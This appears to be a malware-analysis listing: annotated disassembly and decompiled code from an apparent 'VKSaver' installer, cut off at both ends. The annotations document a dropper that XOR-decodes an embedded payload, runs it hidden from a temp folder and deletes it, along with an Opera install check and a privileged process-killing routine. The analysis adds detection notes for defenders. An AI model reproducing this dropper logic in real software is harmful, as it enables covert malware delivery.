.11:
push 0x3E8
call edi
mov ecx, [esp+0x18]
call sub_404910()
test al, al
jz .12
inc esi
cmp esi, 0xF0
jl .11
.12:
cmp byte ptr [0x4B14B9], 0x00
jz .14
mov byte ptr [0x4B14B8], 0x03
xor esi, esi
.13:
push 0x3E8
call edi
; listing truncated
/* WARNING: Removing unreachable block (ram,0x00404cd3) */
/* WARNING: Removing unreachable block (ram,0x00404cf0) */
/* WARNING: Removing unreachable block (ram,0x00404d0e) */
/* WARNING: Removing unreachable block (ram,0x00404d1b) */
/* WARNING: Removing unreachable block (ram,0x00404d24) */
/* WARNING: Removing unreachable block (ram,0x00404d38) */
/* WARNING: Removing unreachable block (ram,0x00404d41) */
/* WARNING: Removing unreachable block (ram,0x00404d4a) */
/* WARNING: Removing unreachable block (ram,0x00404d53) */
/* WARNING: Removing unreachable block (ram,0x00404d63) */
/* WARNING: Removing unreachable block (ram,0x00404d6c) */
/* DISPLAY WARNING: Type casts are NOT being printed */
/* sub_404a80 -- drops an embedded executable to a temp subdirectory, runs it,
 * and removes it afterwards.
 * The decompiler lost every call argument in this function (the frame is
 * esp-relative after __alloca_probe) and discarded several blocks as
 * unreachable, so the asm listing above is the authoritative view of the
 * argument values; this view only preserves the control flow. Combining the
 * two views:
 *  - everything up to code_r0x00404cb5 is gated on the global wide string at
 *    0x4b1048 being non-empty (it is later used as the child's argument);
 *  - the path is <GetTempPathW>\<hex><hex>\downloader.exe, where the hex parts
 *    come from wsprintfW("%x%x") over values derived from the process id, the
 *    tick count and the current FILETIME; the directory is created first;
 *  - a 0x23984-byte buffer is filled by XOR-ing 0x8e60 dwords from 0x4146b0
 *    with a key that starts at 0x75bcd15 and is rotated left 13 bits per dword,
 *    i.e. an obfuscated embedded payload decoded at runtime;
 *  - sub_401650(path, buffer, size) returning 1 skips the write; otherwise, if
 *    sub_401510(path) is nonzero, the buffer is written out with
 *    CreateFileW(GENERIC_WRITE, CREATE_ALWAYS) / WriteFile;
 *  - the file is launched with CreateProcessW, command line "\"%s\" %s"
 *    (path, string at 0x4b1048), creation flags 0x8000000 = CREATE_NO_WINDOW;
 *  - after sub_402ce0 the dropped file and its directory are deleted, and the
 *    global counter at 0x4b1044 is incremented.
 * Detection angle: process creation from a randomly named subdirectory of the
 * temp folder with image name downloader.exe, followed by DeleteFileW /
 * RemoveDirectoryW of that same path. */
void sub_404a80(void)
{
int16_t iVar1;
char cVar2;
uint32_t uVar3;
int16_t *piVar4;
int32_t iVar5;
uint32_t uVar6;
uint32_t *puVar7;
undefined4 *puVar8;
undefined4 *puVar9;
int32_t iVar10;
__alloca_probe();
_memset();
/* Gate: nothing is dropped when the argument string at 0x4b1048 is empty. */
if ([0x0x4b1048] == 0) goto code_r0x00404cb5;
(*kernel32.GetTempPathW)();
/* Inline wcslen over the temp path; a trailing backslash is appended when missing. */
piVar4 = &stack0x00000058;
do {
iVar1 = *piVar4;
piVar4 = piVar4 + 1;
} while (iVar1 != 0);
iVar5 = piVar4 - &stack0x0000005a >> 1;
if (*(&stack0x00000056 + iVar5 * 2) != 0x5c) {
*(&stack0x00000058 + iVar5 * 2) = 0x5c;
}
/* Pseudo-random directory name: wsprintfW("%x%x", ...) from these three sources (see asm). */
(*kernel32.GetSystemTimeAsFileTime)();
(*kernel32.GetCurrentProcessId)();
(*kernel32.GetTickCount)();
(*user32.wsprintfW)();
/* Copy the directory path into a second buffer (used later for RemoveDirectoryW). */
iVar5 = 0;
do {
piVar4 = &stack0x00000054 + iVar5;
*(&stack0x00000454 + iVar5) = *piVar4;
iVar5 = iVar5 + 2;
} while (*piVar4 != 0);
(*kernel32.CreateDirectoryW)();
/* Seek to the end of the path and append "\downloader.exe" (8 dwords = 16 wide chars). */
puVar9 = &stack0x0000004a;
do {
piVar4 = puVar9 + 2;
puVar9 = puVar9 + 2;
} while (*piVar4 != 0);
puVar8 = "\\downloader.exe";
for (iVar5 = 8; iVar5 != 0; iVar5 = iVar5 + -1) {
*puVar9 = *puVar8;
puVar8 = puVar8 + 1;
puVar9 = puVar9 + 1;
}
/* _calloc(0x23984, 1) per the asm; a NULL result only skips the decode, the
 * NULL buffer is still passed on to sub_401650. */
iVar5 = _calloc();
if (iVar5 != 0) {
/* Decode the embedded blob: dword ^= key; key = rol(key, 13); 0x8e60 iterations. */
puVar7 = 0x4146b0;
uVar6 = 0x75bcd15;
iVar10 = 0x8e60;
do {
uVar3 = *puVar7 ^ uVar6;
uVar6 = uVar6 << 0xd | uVar6 >> 0x13;
*(iVar5 + -0x4146b0 + puVar7) = uVar3;
puVar7 = puVar7 + 1;
iVar10 = iVar10 + -1;
} while (iVar10 != 0);
}
/* sub_401650 == 1 -> the file is considered present, go straight to launch. */
cVar2 = sub_401650();
if (cVar2 == '\x01') {
code_r0x00404c46:
(*user32.wsprintfW)();
(*kernel32.CreateProcessW)();
}
else {
/* Otherwise write the decoded buffer to the path (CreateFileW handle checked against -1). */
cVar2 = sub_401510();
if ((cVar2 != '\0') && (iVar5 = (*kernel32.CreateFileW)(), iVar5 != -1)) {
(*kernel32.WriteFile)();
(*kernel32.CloseHandle)();
goto code_r0x00404c46;
}
}
_free();
code_r0x00404cb5:
/* The asm shows a WaitForSingleObject / Sleep polling loop with sub_404910 between
 * here and the cleanup; the decompiler removed those blocks as unreachable. */
sub_402ce0();
if ([0x0x4b1048] != 0) {
/* Clean up the dropped file and its directory. */
(*kernel32.DeleteFileW)();
(*kernel32.RemoveDirectoryW)();
}
[0x0x4b1044] = [0x0x4b1044] + 1;
sub_406beb();
return;
}
0x405EB0 sub_405eb0 str 3 api 14 imm 20 Unknown
; sub_405eb0 -- installer UI: registers the window class "VKSaverInstallWnd",
; creates a 500x400 top-level window centred on the desktop, and runs the
; message loop until GetMessageW returns 0. No arguments, no return value.
; Side effects: three bitmaps (resource ids 0x84, 0x85, 0x87) are selected into
; memory DCs whose handles are stored in the globals 0x4B14B4, 0x4B14B0 and
; 0x4B14AC for the window procedure sub_404dc0 to draw from.
; Review notes: riched20.dll is loaded by bare name (standard DLL search order
; applies); the desktop DC from GetDC is never released and the bitmaps/DCs
; are never destroyed -- harmless only because the process exits afterwards.
sub_405eb0() {
push ebp
mov ebp, esp
sub esp, 0x6C
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push ebx
push esi
push edi
push "riched20.dll"
call [kernel32.LoadLibraryW]
; INITCOMMONCONTROLSEX { dwSize = 8, dwICC = 0xC0FF }.
lea eax, [ebp-0x20]
push eax
mov dword ptr [ebp-0x20], 0x08
mov dword ptr [ebp-0x1C], 0xC0FF
call [comctl32.InitCommonControlsEx]
; WNDCLASSEXW at [ebp-0x50]: cbSize 0x30, style 3, lpfnWndProc sub_404dc0,
; hInstance [0x4B2010], hIcon = LoadIconW(hInst, 0x6B), hCursor = LoadCursorW(0, 0x7F00),
; hbrBackground 0x10, lpszMenuName 0, lpszClassName "VKSaverInstallWnd",
; hIconSm = LoadIconW(hInst, 0x6C).
mov eax, [0x4B2010]
mov esi, [user32.LoadIconW]
push 0x6B
push eax
mov dword ptr [ebp-0x50], 0x30
mov dword ptr [ebp-0x4C], 0x03
mov dword ptr [ebp-0x48], sub_404dc0()
mov dword ptr [ebp-0x44], 0x00
mov dword ptr [ebp-0x40], 0x00
mov [ebp-0x3C], eax
call esi
push 0x7F00
push 0x00
mov [ebp-0x38], eax
call [user32.LoadCursorW]
push 0x6C
push [ebp-0x3C]
mov [ebp-0x34], eax
mov dword ptr [ebp-0x30], 0x10
mov dword ptr [ebp-0x2C], 0x00
mov dword ptr [ebp-0x28], "VKSaverInstallWnd"
call esi
mov [ebp-0x24], eax
lea eax, [ebp-0x50]
push eax
call [user32.RegisterClassExW]
; Bitmap 0x84 -> memory DC stored at 0x4B14B4 (desktop DC kept in [ebp-0x18]).
push 0x84
push [0x4B2010]
call [user32.LoadBitmapW]
mov esi, eax
call [user32.GetDesktopWindow]
push eax
call [user32.GetDC]
mov ebx, [gdi32.CreateCompatibleDC]
push eax
mov [ebp-0x18], eax
call ebx
mov edi, [gdi32.SelectObject]
push esi
push eax
mov [0x4B14B4], eax
call edi
; Bitmap 0x85 -> memory DC at 0x4B14B0.
push 0x85
push [0x4B2010]
call [user32.LoadBitmapW]
push [ebp-0x18]
mov esi, eax
call ebx
push esi
push eax
mov [0x4B14B0], eax
call edi
; Bitmap 0x87 -> memory DC at 0x4B14AC.
push 0x87
push [0x4B2010]
call [user32.LoadBitmapW]
push [ebp-0x18]
mov esi, eax
call ebx
push esi
push eax
mov [0x4B14AC], eax
call edi
; Desktop client rect into [ebp-0x14]; right/bottom are at [ebp-0x0C]/[ebp-0x08].
lea eax, [ebp-0x14]
push eax
call [user32.GetDesktopWindow]
push eax
call [user32.GetClientRect]
; CreateWindowExW(0x08, "VKSaverInstallWnd", title at 0x4B1510, style 0x80C80000,
;   x = width/2 - 250, y = height/2 - 200, 500, 400, NULL, NULL, hInst, NULL).
push 0x00
push [0x4B2010]
push 0x00
push 0x00
mov eax, [ebp-0x08]
cdq
sub eax, edx
push 0x190
sar eax, 0x01
push 0x1F4
sub eax, 0xC8
push eax
mov eax, [ebp-0x0C]
cdq
sub eax, edx
sar eax, 0x01
sub eax, 0xFA
push eax
push 0x80C80000
push 0x4B1510
push "VKSaverInstallWnd"
push 0x08
call [user32.CreateWindowExW]
mov esi, eax
; ShowWindow(hwnd, 5 = SW_SHOW) and UpdateWindow.
push 0x05
push esi
call [user32.ShowWindow]
push esi
call [user32.UpdateWindow]
; Standard message loop over the MSG at [ebp-0x6C].
mov ebx, [user32.GetMessageW]
push 0x00
push 0x00
push 0x00
lea eax, [ebp-0x6C]
push eax
call ebx
test eax, eax
jz .3
mov esi, [user32.TranslateMessage]
mov edi, [user32.DispatchMessageW]
.2:
lea eax, [ebp-0x6C]
push eax
call esi
lea eax, [ebp-0x6C]
push eax
call edi
push 0x00
push 0x00
push 0x00
lea eax, [ebp-0x6C]
push eax
call ebx
test eax, eax
jnz .2
.3:
mov ecx, [ebp-0x04]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_406beb()
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/* Decompiled view of sub_405eb0 above: installer window and message loop.
 * Registers "VKSaverInstallWnd" (window procedure sub_404dc0), creates a
 * 500x400 window centred on the desktop, and pumps messages until
 * GetMessageW returns 0. The three memory DCs holding bitmaps 0x84/0x85/0x87
 * are published in the globals 004b14b4 / 004b14b0 / 004b14ac.
 * Decompiler artifact: the GetDesktopWindow/GetClientRect pair below has its
 * argument attached to the wrong call; the asm passes &rect (auStack_18) to
 * GetClientRect. riched20.dll is loaded by bare name. */
void sub_405eb0(void)
{
code *pcVar1;
code *pcVar2;
code *pcVar3;
undefined4 uVar4;
undefined4 uVar5;
int32_t iVar6;
undefined auStack_70 [28];
undefined4 uStack_54;
undefined4 uStack_50;
code *pcStack_4c;
undefined4 uStack_48;
undefined4 uStack_44;
undefined4 uStack_40;
undefined4 uStack_3c;
undefined4 uStack_38;
undefined4 uStack_34;
undefined4 uStack_30;
undefined4 uStack_2c;
undefined4 uStack_28;
undefined4 uStack_24;
undefined4 uStack_20;
undefined4 uStack_1c;
undefined auStack_18 [8];
int32_t iStack_10;
int32_t iStack_c;
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
(*kernel32.LoadLibraryW)("riched20.dll");
/* INITCOMMONCONTROLSEX { dwSize 8, dwICC 0xc0ff }. */
uStack_24 = 8;
uStack_20 = 0xc0ff;
(*comctl32.InitCommonControlsEx)(&uStack_24);
pcVar1 = user32.LoadIconW;
/* WNDCLASSEXW: cbSize 0x30, style 3, wndproc sub_404dc0, hInstance from 0x4b2010,
 * icon 0x6b, cursor 0x7f00, background brush 0x10, class "VKSaverInstallWnd", small icon 0x6c. */
uStack_54 = 0x30;
uStack_50 = 3;
pcStack_4c = sub_404dc0;
uStack_48 = 0;
uStack_44 = 0;
uStack_40 = [0x0x4b2010];
uStack_3c = (*user32.LoadIconW)([0x0x4b2010], 0x6b);
uStack_38 = (*user32.LoadCursorW)(0, 0x7f00);
uStack_34 = 0x10;
uStack_30 = 0;
uStack_2c = "VKSaverInstallWnd";
uStack_28 = (*pcVar1)(uStack_40, 0x6c);
(*user32.RegisterClassExW)(&uStack_54);
/* Three bitmaps each selected into a memory DC compatible with the desktop DC (never released). */
uVar4 = (*user32.LoadBitmapW)([0x0x4b2010], 0x84);
uVar5 = (*user32.GetDesktopWindow)();
uStack_1c = (*user32.GetDC)(uVar5);
pcVar2 = gdi32.CreateCompatibleDC;
004b14b4 = (*gdi32.CreateCompatibleDC)(uStack_1c);
pcVar1 = gdi32.SelectObject;
(*gdi32.SelectObject)(004b14b4, uVar4);
uVar4 = (*user32.LoadBitmapW)([0x0x4b2010], 0x85);
004b14b0 = (*pcVar2)(uStack_1c);
(*pcVar1)(004b14b0, uVar4);
uVar4 = (*user32.LoadBitmapW)([0x0x4b2010], 0x87);
004b14ac = (*pcVar2)(uStack_1c);
(*pcVar1)(004b14ac, uVar4);
/* Actually GetClientRect(GetDesktopWindow(), &auStack_18); iStack_10/iStack_c are right/bottom. */
uVar4 = (*user32.GetDesktopWindow)(auStack_18);
(*user32.GetClientRect)(uVar4);
/* Centred 500x400 window; ex-style 8, style 0x80c80000, title string at 0x4b1510. */
uVar4 = (*user32.CreateWindowExW)
(8, "VKSaverInstallWnd", 0x4b1510, 0x80c80000, iStack_10 / 2 + -0xfa, iStack_c / 2 + -200, 500, 400, 0, 0,
[0x0x4b2010], 0);
/* 5 = SW_SHOW. */
(*user32.ShowWindow)(uVar4, 5);
(*user32.UpdateWindow)(uVar4);
pcVar3 = user32.GetMessageW;
iVar6 = (*user32.GetMessageW)(auStack_70, 0, 0, 0);
pcVar2 = user32.TranslateMessage;
pcVar1 = user32.DispatchMessageW;
while (iVar6 != 0) {
(*pcVar2)(auStack_70);
(*pcVar1)(auStack_70);
iVar6 = (*pcVar3)(auStack_70, 0, 0, 0);
}
sub_406beb();
return;
}
0x4010B0 sub_4010b0 str 3 api 9 imm 11 Unknown
; sub_4010b0 -- fingerprints an Opera installation for the current user.
; Returns al = 1 when both
;   (a) %APPDATA%\Opera\Opera\operaprefs.ini exists (CSIDL 0x1A = CSIDL_APPDATA), and
;   (b) HKCU\Software\Opera Software\"Last CommandLine v2", with all '"'
;       characters stripped, names an existing file;
; otherwise al = 0. No arguments, no side effects beyond the registry read.
; Buffers: [ebp-0x620] folder path, [ebp-0x210] ini path / raw registry data
; (0x104 bytes requested), [ebp-0x418] de-quoted copy (0x208 bytes),
; [ebp-0x870] WIN32_FIND_DATAW, [ebp-0x874] hKey, [ebp-0x878] cbData, [ebp-0x87C] type.
; Review notes: the value type returned by RegQueryValueExW is never checked
; (a non-string value would be processed as wide chars); the copy loop is
; bounded by cbData and the final store is range-checked (/GS), so the
; de-quoted buffer cannot overflow.
sub_4010b0() {
push ebp
mov ebp, esp
sub esp, 0x880
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push esi
push edi
; SHGetFolderPathW(NULL, 0x1A, NULL, 0, &[ebp-0x620]).
lea eax, [ebp-0x620]
push eax
push 0x00
push 0x00
push 0x1A
push 0x00
call [shell32.SHGetFolderPathW]
lea eax, [ebp-0x620]
push eax
lea eax, [ebp-0x210]
push "%s\\Opera\\Opera\\operaprefs.ini"
push eax
call [user32.wsprintfW]
add esp, 0x0C
; Existence check via FindFirstFileW / FindClose.
lea eax, [ebp-0x870]
push eax
lea eax, [ebp-0x210]
push eax
call [kernel32.FindFirstFileW]
cmp eax, 0xFFFFFFFF
jz .5
push eax
call [kernel32.FindClose]
; RegOpenKeyExW(0x80000001 = HKEY_CURRENT_USER, "Software\Opera Software", 0, 0x20019 = KEY_READ, &hKey).
lea eax, [ebp-0x874]
push eax
push 0x20019
push 0x00
push "Software\\Opera Software"
push 0x80000001
mov dword ptr [ebp-0x874], 0x00
call [advapi32.RegOpenKeyExW]
mov eax, [ebp-0x874]
test eax, eax
jz .5
; RegQueryValueExW(hKey, "Last CommandLine v2", NULL, &type, &[ebp-0x210], &cbData = 0x104).
lea ecx, [ebp-0x878]
push ecx
lea ecx, [ebp-0x210]
push ecx
lea ecx, [ebp-0x87C]
push ecx
push 0x00
push "Last CommandLine v2"
push eax
mov dword ptr [ebp-0x87C], 0x01
mov dword ptr [ebp-0x878], 0x104
call [advapi32.RegQueryValueExW]
push [ebp-0x874]
mov edi, eax
call [advapi32.RegCloseKey]
; Require cbData != 0 and a zero (success) result.
mov esi, [ebp-0x878]
test esi, esi
jz .5
test edi, edi
jnz .5
; Copy loop: esi = wide-char count, ecx = source index, edx = number of '"' skipped.
xor edx, edx
xor ecx, ecx
shr esi, 0x01
jz .4
jmp .1
.1:
movzx edi, word ptr [ebp+ecx*2-0x210]
cmp edi, 0x22
jnz .2
inc edx
jmp .3
.2:
mov eax, ecx
sub eax, edx
mov [ebp+eax*2-0x418], di
.3:
inc ecx
cmp ecx, esi
jb .1
.4:
; Terminator index in bytes = (count - quotes) * 2; must stay below 0x208.
sub esi, edx
add esi, esi
cmp esi, 0x208
jnb .6
xor eax, eax
mov [ebp+esi*1-0x418], ax
; Final check: the de-quoted path must exist.
lea eax, [ebp-0x870]
push eax
lea eax, [ebp-0x418]
push eax
call [kernel32.FindFirstFileW]
cmp eax, 0xFFFFFFFF
jz .5
push eax
call [kernel32.FindClose]
mov al, 0x01
pop edi
pop esi
mov ecx, [ebp-0x04]
xor ecx, ebp
call sub_406beb()
mov esp, ebp
pop ebp
ret
.5:
; Common failure exit: al = 0.
mov ecx, [ebp-0x04]
pop edi
xor ecx, ebp
xor al, al
pop esi
call sub_406beb()
mov esp, ebp
pop ebp
ret
.6:
; /GS range-check failure: aborts the process.
call ___report_rangecheckfailure()
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/* Decompiled view of sub_4010b0 above: Opera presence check.
 * Succeeds when %APPDATA%\Opera\Opera\operaprefs.ini exists and the de-quoted
 * HKCU\Software\Opera Software\"Last CommandLine v2" value names an existing
 * file. The decompiler shows void, but the asm returns al = 1 on the inner
 * success path and 0 on every other exit.
 * aiStack_214 holds the ini path, then the raw registry data; aiStack_41c is
 * the de-quoted copy; auStack_874 is the WIN32_FIND_DATAW. */
void sub_4010b0(void)
{
code *pcVar1;
int32_t iVar2;
uint32_t uVar3;
uint32_t uVar4;
undefined4 uStack_880;
uint32_t uStack_87c;
int32_t iStack_878;
undefined auStack_874 [592];
undefined auStack_624 [520];
int16_t aiStack_41c [260];
int16_t aiStack_214 [262];
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
/* 0x1a = CSIDL_APPDATA. */
(*shell32.SHGetFolderPathW)(0, 0x1a, 0, 0, auStack_624);
(*user32.wsprintfW)(aiStack_214, "%s\\Opera\\Opera\\operaprefs.ini", auStack_624);
iVar2 = (*kernel32.FindFirstFileW)(aiStack_214, auStack_874);
if (iVar2 != -1) {
(*kernel32.FindClose)(iVar2);
iStack_878 = 0;
/* 0x80000001 = HKEY_CURRENT_USER; 0x20019 = KEY_READ. */
(*advapi32.RegOpenKeyExW)(0x80000001, "Software\\Opera Software", 0, 0x20019, &iStack_878);
if (iStack_878 != 0) {
/* uStack_880 receives the value type (never checked); uStack_87c is cbData in/out. */
uStack_880 = 1;
uStack_87c = 0x104;
iVar2 = (*advapi32.RegQueryValueExW)(iStack_878, "Last CommandLine v2", 0, &uStack_880, aiStack_214, &uStack_87c);
(*advapi32.RegCloseKey)(iStack_878);
if ((uStack_87c != 0) && (iVar2 == 0)) {
/* Copy the value into aiStack_41c dropping every '"' (0x22); iVar2 counts the drops. */
iVar2 = 0;
uVar3 = 0;
uVar4 = uStack_87c >> 1;
if (uVar4 != 0) {
do {
if (aiStack_214[uVar3] == 0x22) {
iVar2 = iVar2 + 1;
}
else {
aiStack_41c[uVar3 - iVar2] = aiStack_214[uVar3];
}
uVar3 = uVar3 + 1;
} while (uVar3 < uVar4);
}
/* /GS range check on the terminator index before the store below. */
if (0x207 < (uVar4 - iVar2) * 2) {
___report_rangecheckfailure();
pcVar1 = swi(3);
(*pcVar1)();
return;
}
aiStack_41c[uVar4 - iVar2] = 0;
/* The de-quoted command line must name an existing file. */
iVar2 = (*kernel32.FindFirstFileW)(aiStack_41c, auStack_874);
if (iVar2 != -1) {
(*kernel32.FindClose)(iVar2);
sub_406beb();
return;
}
}
}
}
sub_406beb();
return;
}
0x403190 sub_403190 str 2 api 11 imm 13 Unknown
; sub_403190 -- terminates every other process whose module base name
; contains "vksaver.exe" (case-insensitive).
; Steps: EnumProcesses into a 0x400-byte PID array; enable SeDebugPrivilege on
; the current token (TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY = 0x28, attribute 2 =
; SE_PRIVILEGE_ENABLED); for each PID other than our own, OpenProcess with
; 0x411 (PROCESS_TERMINATE|PROCESS_VM_READ|PROCESS_QUERY_INFORMATION), read the
; first module's base name, lower-case it, and on a "vksaver.exe" substring
; match TerminateProcess + Sleep(500 ms). No arguments, no return value.
; Stack: [ebp-0x51C] own PID, [ebp-0x508] PID array (max 256 entries),
; [ebp-0x520] bytes returned, [ebp-0x524] token, [ebp-0x518] TOKEN_PRIVILEGES,
; [ebp-0x928] module handles, [ebp-0x108] base name (0x80 wide chars).
; Review notes: the EnumProcesses result and its 0x400-byte cap are not
; checked, so on systems with more than 256 processes later PIDs are silently
; skipped; AdjustTokenPrivileges' result is ignored; the privilege is never
; reverted.
sub_403190() {
push ebp
mov ebp, esp
sub esp, 0x92C
mov eax, [0x46F000]
xor eax, ebp
mov [ebp-0x04], eax
push ebx
push esi
push edi
call [kernel32.GetCurrentProcessId]
mov esi, eax
; EnumProcesses(&[ebp-0x508], 0x400, &[ebp-0x520]); esi/[ebp-0x51C] keep our own PID.
lea eax, [ebp-0x520]
push eax
push 0x400
lea eax, [ebp-0x508]
push eax
mov [ebp-0x51C], esi
call [psapi.EnumProcesses]
; OpenProcessToken(GetCurrentProcess(), 0x28, &[ebp-0x524]).
lea eax, [ebp-0x524]
push eax
push 0x28
call [kernel32.GetCurrentProcess]
push eax
call [advapi32.OpenProcessToken]
test eax, eax
jz .1
; TOKEN_PRIVILEGES { PrivilegeCount 1, Luid(SeDebugPrivilege), Attributes 2 } -> AdjustTokenPrivileges.
lea eax, [ebp-0x514]
push eax
push "SeDebugPrivilege"
push 0x00
call [advapi32.LookupPrivilegeValueW]
push 0x00
push 0x00
push 0x00
lea eax, [ebp-0x518]
push eax
push 0x00
push [ebp-0x524]
mov dword ptr [ebp-0x518], 0x01
mov dword ptr [ebp-0x50C], 0x02
call [advapi32.AdjustTokenPrivileges]
.1:
; edi = index; loop while bytes returned >= 4.
xor edi, edi
test dword ptr [ebp-0x520], 0xFFFFFFFC
jbe .6
mov ebx, [kernel32.TerminateProcess]
jmp .2
jmp .2
.2:
; Skip our own PID.
mov eax, [ebp+edi*4-0x508]
cmp eax, esi
jz .5
push eax
push 0x00
push 0x411
call [kernel32.OpenProcess]
mov esi, eax
test esi, esi
jz .4
; EnumProcessModules(hProc, &[ebp-0x928], 0x400, &[ebp-0x528]); first module = main image.
lea eax, [ebp-0x528]
push eax
push 0x400
lea eax, [ebp-0x928]
push eax
push esi
call [psapi.EnumProcessModules]
test eax, eax
jz .3
push 0x80
lea eax, [ebp-0x108]
push eax
push [ebp-0x928]
push esi
call [psapi.GetModuleBaseNameW]
; Lower-case in place, then substring search for "vksaver.exe".
lea eax, [ebp-0x108]
push 0x80
push eax
call __wcslwr_s()
lea eax, [ebp-0x108]
push "vksaver.exe"
push eax
call _wcsstr()
add esp, 0x10
test eax, eax
jz .3
; TerminateProcess(hProc, 0); Sleep(0x1F4 = 500 ms).
push 0x00
push esi
call ebx
push 0x1F4
call [kernel32.Sleep]
.3:
push esi
call [kernel32.CloseHandle]
.4:
; Restore esi = own PID (it was reused as the process handle).
mov esi, [ebp-0x51C]
.5:
mov eax, [ebp-0x520]
inc edi
shr eax, 0x02
cmp edi, eax
jb .2
.6:
mov ecx, [ebp-0x04]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_406beb()
mov esp, ebp
pop ebp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
/*
 * sub_403190 -- enumerate all processes and terminate any whose first
 * module base name contains "vksaver.exe".
 *
 * What the code below does:
 *   1. GetCurrentProcessId() so the loop can skip itself.
 *   2. EnumProcesses() into a 0x400-byte (256-entry) PID array; the return
 *      value is not checked and the PID count is derived from the byte count
 *      (uStack_524 >> 2), so processes beyond the first 256 are never seen.
 *   3. Opens its own token with 0x28 (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY)
 *      and enables SeDebugPrivilege. The AdjustTokenPrivileges result is not
 *      checked, so the scan proceeds with or without the privilege.
 *   4. For every other PID: OpenProcess(0x411 = PROCESS_TERMINATE |
 *      PROCESS_VM_READ | PROCESS_QUERY_INFORMATION), read the first module's
 *      base name, lower-case it, and on a substring match call
 *      TerminateProcess and Sleep(500).
 *
 * Defender note: the sequence "enable SeDebugPrivilege, then OpenProcess with
 * PROCESS_TERMINATE against many PIDs, then TerminateProcess" is the
 * observable behaviour to look for in token and process-access telemetry.
 *
 * No return value. sub_406beb() at the end looks like the MSVC
 * security-cookie check (the listing computes ecx = saved cookie ^ ebp) --
 * not verified here.
 */
void sub_403190(void)
{
code *pcVar1;
int32_t iVar2;
undefined4 uVar3;
int32_t iVar4;
uint32_t uVar5;
undefined4 auStack_92c [256];   /* HMODULE array for EnumProcessModules (0x400 bytes) */
undefined auStack_52c [4];      /* cbNeeded for EnumProcessModules */
undefined4 uStack_528;          /* hToken (own process token) */
uint32_t uStack_524;            /* bytes returned by EnumProcesses */
int32_t iStack_520;             /* own PID, kept so iVar2 can be restored after reuse */
undefined4 uStack_51c;          /* TOKEN_PRIVILEGES.PrivilegeCount */
undefined auStack_518 [8];      /* TOKEN_PRIVILEGES.Privileges[0].Luid */
undefined4 uStack_510;          /* TOKEN_PRIVILEGES.Privileges[0].Attributes */
int32_t aiStack_50c [256];      /* PID array (0x400 bytes) */
undefined auStack_10c [260];    /* module base name, 0x80 wide chars used */
uint32_t uStack_8;
uStack_8 = [0x0x46f000#SecurityCookie] ^ &stack0xfffffffc;
iVar2 = (*kernel32.GetCurrentProcessId)();
iStack_520 = iVar2;
/* Return value not checked; on failure uStack_524 is whatever was on the stack. */
(*psapi.EnumProcesses)(aiStack_50c, 0x400, &uStack_524);
/* The decompiler folded the call chain; per the listing this is
 * OpenProcessToken(GetCurrentProcess(), 0x28, &uStack_528), i.e.
 * TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY on the current process. */
uVar3 = (*kernel32.GetCurrentProcess)(0x28, &uStack_528);
iVar4 = (*advapi32.OpenProcessToken)(uVar3);
if (iVar4 != 0) {
(*advapi32.LookupPrivilegeValueW)(0, "SeDebugPrivilege", auStack_518);
uStack_51c = 1;   /* PrivilegeCount */
uStack_510 = 2;   /* SE_PRIVILEGE_ENABLED */
/* Result ignored: failure to enable the privilege does not stop the scan. */
(*advapi32.AdjustTokenPrivileges)(uStack_528, 0, &uStack_51c, 0, 0, 0);
}
pcVar1 = kernel32.TerminateProcess;
uVar5 = 0;
/* Only loop when at least one 4-byte PID came back. */
if ((uStack_524 & 0xfffffffc) != 0) {
do {
/* Skip own PID; 0x411 = PROCESS_TERMINATE | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION. */
if ((aiStack_50c[uVar5] != iVar2) &&
(iVar4 = (*kernel32.OpenProcess)(0x411, 0, aiStack_50c[uVar5]), iVar2 = iStack_520, iVar4 != 0)) {
iVar2 = (*psapi.EnumProcessModules)(iVar4, auStack_92c, 0x400, auStack_52c);
if (iVar2 != 0) {
/* Only the first module (the main image) is inspected. */
(*psapi.GetModuleBaseNameW)(iVar4, auStack_92c[0], auStack_10c, 0x80);
__wcslwr_s(auStack_10c, 0x80);
/* Substring match after lower-casing, not an exact file-name compare. */
iVar2 = _wcsstr(auStack_10c, "vksaver.exe");
if (iVar2 != 0) {
(*pcVar1)(iVar4, 0);          /* TerminateProcess(hProcess, 0) */
(*kernel32.Sleep)(500);
}
}
(*kernel32.CloseHandle)(iVar4);
iVar2 = iStack_520;   /* iVar2 was clobbered above; restore own PID for the next compare */
}
uVar5 = uVar5 + 1;
} while (uVar5 < uStack_524 >> 2);   /* byte count / 4 = number of PIDs */
}
sub_406beb();
return;
}
0x4025E0 sub_4025e0 str 2 api 11 imm 9 Unknown
sub_4025e0() {
; __thiscall: ecx = wide-char directory path, [ebp+0x08] = byte flag.
; Deletes every non-directory entry directly inside the directory (no
; recursion). Files that cannot be deleted are renamed to a *.tmp name and
; scheduled for deletion at reboot with MoveFileExW(..., NULL,
; MOVEFILE_DELAY_UNTIL_REBOOT). When the flag is 0 the directory itself is
; removed afterwards.
push ebp
mov ebp, esp
sub esp, 0xAB8
mov eax, [0x46F000]                  ; security cookie
xor eax, ebp
mov [ebp-0x08], eax
push ebx
push esi
mov ebx, ecx                         ; ebx = directory path (this)
push edi
lea edx, [ebp-0x60C]                 ; edx = local copy of the path (search pattern buffer)
mov esi, ebx
.1:
mov ax, [esi]                        ; copy the path wide char by wide char
lea esi, [esi+0x02]
mov [edx], ax
add edx, 0x02
cmp word ptr [esi], 0x00
jnz .1
mov eax, 0x5C                        ; L'\\'
cmp [esi-0x02], ax                   ; already ends in a backslash?
jz .2
mov [edx], ax                        ; append backslash to the local copy
mov [esi], eax                       ; also writes a dword (L'\\' + L'\0') into the CALLER's buffer
add edx, 0x02
.2:
mov ecx, 0x46B3B8                    ; global wide string appended as the search pattern (contents not shown here)
